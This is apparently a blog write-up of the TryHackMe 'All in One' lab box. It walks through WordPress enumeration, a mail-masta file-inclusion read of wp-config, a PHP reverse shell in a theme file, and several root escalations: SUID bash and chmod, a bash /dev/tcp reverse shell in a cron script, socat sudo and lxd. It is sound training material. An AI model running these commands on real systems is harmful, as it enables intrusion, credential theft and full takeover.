thm-allinonemj-public

All in One is an easy Linux box on TryHackMe.

Enumeration


Starting off with an nmap scan, I find port 21, 22 and 80 open

root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan  
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)  
Nmap scan report for 10.10.166.147                             
Host is up (0.22s latency).                                         
Not shown: 997 closed ports                                        
PORT   STATE SERVICE VERSION                                       
21/tcp open  ftp     vsftpd 3.0.3                                    
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)            
| ftp-syst:                                                   
|   STAT:                                                           
| FTP server status:                                             
|      Connected to ::ffff:10.2.8.75                               
|      Logged in as ftp                                               
|      TYPE: ASCII                                                     
|      No session bandwidth limit                                    
|      Session timeout in seconds is 300                                
|      Control connection is plain text                               
|      Data connections will be plain text                         
|      At session startup, client count was 4                           
|      vsFTPd 3.0.3 - secure, fast, stable                           
|_End of status                                                          
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                           
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)           
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)               
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)         
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                      
|_http-server-header: Apache/2.4.29 (Ubuntu)                           
|_http-title: Apache2 Ubuntu Default Page: It works                     
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel               
                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

FTP Enumeration

Since FTP is allowing anonymous access, I login and start to poke around

root@kali:~/tryhackme/allinone# ftp 10.10.166.147

Connected to 10.10.166.147.                  
220 (vsFTPd 3.0.3)                          
Name (10.10.166.147:root): anonymous           
331 Please specify the password.            
Password:                               
230 Login successful.               
Remote system type is UNIX.    
Using binary mode to transfer files. 
 
ftp> dir -a                                                           
200 PORT command successful. Consider using PASV.      
150 Here comes the directory listing.                  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .. 
226 Directory send OK. 

Nothing is located here, so I try to upload files, however I am not allowed to do that

ftp> put new                       
local: new remote: new                              
200 PORT command successful. Consider using PASV. 
553 Could not create file. 

Moving onto to port 80, I run gobuster to look for any directories. Here I find /wordpress

HTTP Enumeration

root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.166.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html
[+] Timeout:        10s
===============================================================
2020/12/09 15:39:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)

Since /wordpress is open, I can run wpscan to gather more information

root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress                                                                                                                                             
_______________________________________________________________                                         
         __          _______   _____                                                                    
         \ \        / /  __ \ / ____|                                                                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                  
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \      
            \  /\  /  | |     ____) | (__| (_| | | | |                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                  
                                                                                                        
         WordPress Security Scanner by the WPScan Team               
                         Version 3.7.6            
       Sponsored by Automattic - https://automattic.com/            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                       
_______________________________________________________________                
                                                                               
[i] It seems like you have not updated the database for some time.                
[?] Do you want to update now? [Y]es [N]o, default: [N]N                           
[+] URL: http://10.10.166.147/wordpress/                                            
[+] Started: Wed Dec  9 16:54:36 2020                                      
                                                    
Interesting Finding(s):                               

[+] http://10.10.166.147/wordpress/           
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)                                                    
 | Found By: Headers (Passive Detection)
 | Confidence: 100%                                                                                     
                                                    
[+] http://10.10.166.147/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                                 
 | References:                                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API 
 | References:                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
                                                    
[+] http://10.10.166.147/wordpress/readme.html                                                          
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                      
                                                    
[+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%              
                                                                                                        
[+] http://10.10.166.147/wordpress/wp-cron.php                                                          
 | Found By: Direct Access (Aggressive Detection)                                                       
 | Confidence: 60%                                                                                      
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299                        
                                                    
[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
                                                    
[+] WordPress theme in use: twentytwenty                                                                
 | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/      
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z                                                               
 | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt                                                                                                                              
 | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team                                                                                                                                                                                    
 | Author URI: https://wordpress.org/
 |                                    
 | Found By: Css Style In Homepage (Passive Detection)
 |                    
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <====================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Dec  9 16:54:52 2020

Exploit


Mail-Masta Exploit

Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db

etcpasswd

Looking through this exploit, I find that that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd is a working exploit as I can view the file

etcpasswd

Since this is working properly, I need to find a file to read that will give me useful information. I find a medium article detailing on how to extract the wp-config file by converting it to base64 first. To do this, I just need to edit the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

base64

This outputs a large base64 value. I take this value and put it in a file named wp-config. I then decrypt it to properly read the file

root@kali:~/tryhackme/allinone# cat wp-config | base64 -d

.......................................................

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', '*******************' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

.......................................................

WordPress Reverse Shell

With this password, I can login to the wordpress website using this password. Once logged in, I navigate to Appearance > Theme Editor. I then select 404 Template (404.php) and replace the contents with a php reverse shell. If you wish to read up more on how to gain a reverse shell on wordpress, I recommend checking out this article by Hacking Articles

theme

Once I finish editing this file, I save it and set up a netcat listener. Once my listener is running, I navigate to /wp-content/themes/twentytwenty/404.php to gain a reverse shell

root@kali:~/tryhackme/allinone# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:59:22 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation as www-data


Before running any scans, I want to import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.4$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/allinone# stty raw -echo
root@kali:~/tryhackme/allinone# fg

bash-4.4$ 

I then run LinEnum.sh and find several ways to escalate my privileges straight to root

bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash 

SUID

Looking at the SUID section of LinEnum, it immediately points out 3 known vulnerable SUID files. I will be using gtfobins to exploit these

suid

Starting off with bash, I can use look on gtfobins to find the correct syntax to exploit it with bash

bash-4.4$ bash -p
bash-4.4# 

Looking at chmod on gtfobins, I find that it will not drop me a shell, but allow me to edit the permissions on any file. You can edit the root.txt and user.txt file to be able to read them, but I want to gain root access. I instead change the /etc/passwd file so I can insert my own password.

bash-4.4# chmod 0777 /etc/passwd
bash-4.4# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1672 Oct  6 11:57 /etc/passwd

I need to generate a password using openssl to insert into the /etc/passwd file

root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password
$1$root$1fvaXuILgb4rdRlHdQ80N/

Now edit the file and replace the x next to root with the new hash

bash-4.4$ vi /etc/passwd

root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash

After saving this, we can login to root with the password of password

bash-4.4$ su root       
Password: 
root@elyana:/# 

Cronjob

Looking at the cronjobs, I find that root is running one out of /var/backups/script.sh

cron

Navigating there, I see I am allowed to edit the file

bash-4.4$ ls -la
total 52
drwxr-xr-x  2 root root  4096 Oct  7 13:41 .
drwxr-xr-x 14 root root  4096 Oct  5 19:43 ..
-rw-r--r--  1 root root 32890 Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root  3570 Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root    73 Oct  7 13:37 script.sh

Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey

echo ‘#!/bin/bash’ > script.sh
echo ‘bash -i >& /dev/tcp/10.9.2.255/9002 0>&1’ >> script.sh

With this edited, I set up a netcat listener and wait for a few moments. I then recieve a connection and a root shell

root@kali:~/tryhackme/allinone# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036
bash: cannot set terminal process group (19460): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# 

Elevating to elyana


Moving backwards, I will work as www-data and try to elevate to elyana.

Reading the hint.txt file on elyana desktop I find that the password for this user is stored somewhere

bash-4.4$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I start looking around for anything that is useful. Under /etc/ I find an interesting result

find / -user elyana -type f 2>/dev/null

This looks promissing, so I read the file and find credentials.

bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: *********

Another way of finding this file is running linpeas

pass

Testing this password, I can login to elyana

bash-4.4$ su elyana
Password: 
bash-4.4$ whoami
elyana

Privilege Escalation as elyana


Like www-data, there are several ways to elevate to root as elyana. I will outline a few methods here. I rerun LinEnum.sh to help find results

Sudo

The first thing I do is run sudo -l to see if I am allowed to run any commands as sudo. Here, I find I can run socat

bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

Looking on gtfobins I see an easy way to escalte to root. Running this command gives me root access

bash-4.4$ sudo socat stdin exec:/bin/sh
whoami
root

or use ( and cath with a netcat listener)

sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane

lxd

Looking at LinEnum I find that we are a member of the lxd group

lxd

This is a popular exploit and I will be following this guide to do so.

First, I download the alpine builder and build it on my local machine.

root@kali:~/tryhackme/allinone# git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (31/31), done.

root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/

root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine 

Determining the latest release... v3.12
..................................................................................
OK: 8 MiB in 19 packages

Once this is done building, I upload it to the machine and import it

bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
--2020-12-10 02:23:07--  http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199386 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   321KB/s    in 16s     

2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386]

lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage

I want to double check it has been created properly

bash-4.4$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | fa664dd4e321 | no     | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

The image was created properly, so I can now start this and execute it to gain root access

bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite

bash~4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

bash-4.4$ lxc start ignite

bash-4.4$ lxc exec ignite /bin/sh

~ # whoami
root

Finally the user.txt and root.txt are encoded using base64, go ahead decode them, and submit your flags 🚩🚩!

This was a fun box to be honest and it contains some of the most important ways into exploiting a system.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *